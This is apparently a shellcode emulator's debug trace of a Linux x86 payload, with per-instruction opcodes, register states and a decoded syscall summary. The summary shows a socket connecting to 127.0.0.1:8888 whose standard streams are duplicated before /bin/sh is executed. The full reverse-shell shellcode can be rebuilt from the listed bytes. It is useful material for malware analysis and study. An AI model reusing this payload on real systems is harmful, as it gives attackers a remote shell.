graph file bindshell.dot
verbose = 3
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417000
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417000
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 31DB                            xor ebx,ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417002
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] F7E3                            mul ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417004
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417005
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] 43                              inc ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417006
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417007
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 6A02                            push byte 0x2
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417009
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041700b
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] B066                            mov al,0x66
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041700d
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
int socket(int domain=2, int type=1, int protocol=0);
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041700f
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000000e  ecx=0x00416fc2  edx=0x00000000  ebx=0x00000001
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 93                              xchg eax,ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417010
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000001  ecx=0x00416fc2  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 59                              pop ecx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417011
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000001  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] B03F                            mov al,0x3f
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417013
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000003f  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=2);
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417015
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000002  ecx=0x00000002  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 49                              dec ecx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417016
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 79                              jns 0x1
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417011
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000002  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] B03F                            mov al,0x3f
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417013
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000003f  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=1);
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417015
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000001  ecx=0x00000001  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: 
[emu 0x0x653210 [31;1mdebug[0m ] 49                              dec ecx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417016
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] 79                              jns 0x1
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417011
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000001  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] B03F                            mov al,0x3f
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417013
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000003f  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
int dup2(int oldfd=14, int newfd=0);
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417015
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF ZF 
[emu 0x0x653210 [31;1mdebug[0m ] 49                              dec ecx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417016
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 79                              jns 0x1
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417018
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 687F000001                      push dword 0x100007f
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041701d
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fc2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 68020022B8                      push dword 0xb8220002
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417022
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0xffffffff  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417024
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] B066                            mov al,0x66
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417026
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fbe  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 50                              push eax
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417027
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fba  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 51                              push ecx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417028
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fb6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417029
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x0000000e
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] B303                            mov bl,0x3
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041702b
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fbe  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041702d
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000066  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
connect
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041702f
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fb2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 52                              push edx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417030
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fae  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 686E2F7368                      push dword 0x68732f6e
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417035
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416faa  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 682F2F6269                      push dword 0x69622f2f
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041703a
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00000003
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 89E3                            mov ebx,esp
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041703c
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fa6  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 52                              push edx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041703d
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416fa2  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 53                              push ebx
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x0041703e
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416fb2  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 89E1                            mov ecx,esp
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417040
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x00000000  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] B00B                            mov al,0xb
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417042
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] CD80                            int 0x80
execve
int execve (const char *dateiname=00416fa6={//bin/sh}, const char * argv[], const char *envp[]);
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417044
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
[emu 0x0x653210 [31;1mdebug[0m ] 0000                            add [eax],al
cpu error error accessing 0x00000004 not mapped

stepcount 42
copying vertexes
optimizing graph
vertex 0x6b4400
going forwards from 0x6b4400
 -> vertex 0x6b4620
 -> vertex 0x6b4710
 -> vertex 0x6b47f0
 -> vertex 0x6b49e0
 -> vertex 0x6b4b80
 -> vertex 0x6b4d20
 -> vertex 0x6b4e90
copying edges for 0x6b4e90
 -> 0x6bad40
vertex 0x6b5030
going forwards from 0x6b5030
copying edges for 0x6b5030
 -> 0x6bae50
vertex 0x6b5170
going forwards from 0x6b5170
 -> vertex 0x6b5400
copying edges for 0x6b5400
 -> 0x6bb0b0
vertex 0x6b55b0
going forwards from 0x6b55b0
copying edges for 0x6b55b0
 -> 0x6bb1e0
vertex 0x6b5720
going forwards from 0x6b5720
copying edges for 0x6b5720
 -> 0x6bb2f0
vertex 0x6b5860
going forwards from 0x6b5860
copying edges for 0x6b5860
 -> 0x6bb420
vertex 0x6b5ab0
going forwards from 0x6b5ab0
copying edges for 0x6b5ab0
 -> 0x6bb0b0
 -> 0x6bb550
vertex 0x6b5ee0
going forwards from 0x6b5ee0
 -> vertex 0x6b64d0
 -> vertex 0x6b6690
 -> vertex 0x6b6850
 -> vertex 0x6b69a0
 -> vertex 0x6b6af0
 -> vertex 0x6b6c40
 -> vertex 0x6b6d90
 -> vertex 0x6b6ee0
copying edges for 0x6b6ee0
 -> 0x6bbf80
vertex 0x6b7030
going forwards from 0x6b7030
copying edges for 0x6b7030
 -> 0x6bc090
vertex 0x6b70f0
going forwards from 0x6b70f0
 -> vertex 0x6b7260
 -> vertex 0x6b73d0
 -> vertex 0x6b75b0
 -> vertex 0x6b7770
 -> vertex 0x6b78c0
 -> vertex 0x6b7a30
 -> vertex 0x6b7ba0
copying edges for 0x6b7ba0
 -> 0x6bc990
vertex 0x6b7d10
going forwards from 0x6b7d10
copying edges for 0x6b7d10
vertex 0x6b7e40
going forwards from 0x6b7e40
copying edges for 0x6b7e40
[emu 0x0x653210 [31;1mdebug[0m ] cpu state    eip=0x00417046
[emu 0x0x653210 [31;1mdebug[0m ] eax=0x0000000b  ecx=0x00416f9e  edx=0x00000000  ebx=0x00416fa6
[emu 0x0x653210 [31;1mdebug[0m ] esp=0x00416f9e  ebp=0x00000000  esi=0x00000000  edi=0x00000000
[emu 0x0x653210 [31;1mdebug[0m ] Flags: PF SF 
int socket (
     int domain = 2;
     int type = 1;
     int protocol = 0;
) =  14;
int dup2 (
     int oldfd = 14;
     int newfd = 2;
) =  2;
int dup2 (
     int oldfd = 14;
     int newfd = 1;
) =  1;
int dup2 (
     int oldfd = 14;
     int newfd = 0;
) =  0;
int connect (
     int sockfd = 14;
     struct sockaddr_in * serv_addr = 0x00416fbe => 
         struct   = {
             short sin_family = 2;
             unsigned short sin_port = 47138 (port=8888);
             struct in_addr sin_addr = {
                 unsigned long s_addr = 16777343 (host=127.0.0.1);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;
int execve (
     const char * dateiname = 0x00416fa6 => 
           = "//bin/sh";
     const char * argv[] = [
           = 0x00416f9e => 
               = 0x00416fa6 => 
                   = "//bin/sh";
           = 0x00000000 => 
             none;
     ];
     const char * envp[] = 0x00000000 => 
         none;
) =  0;
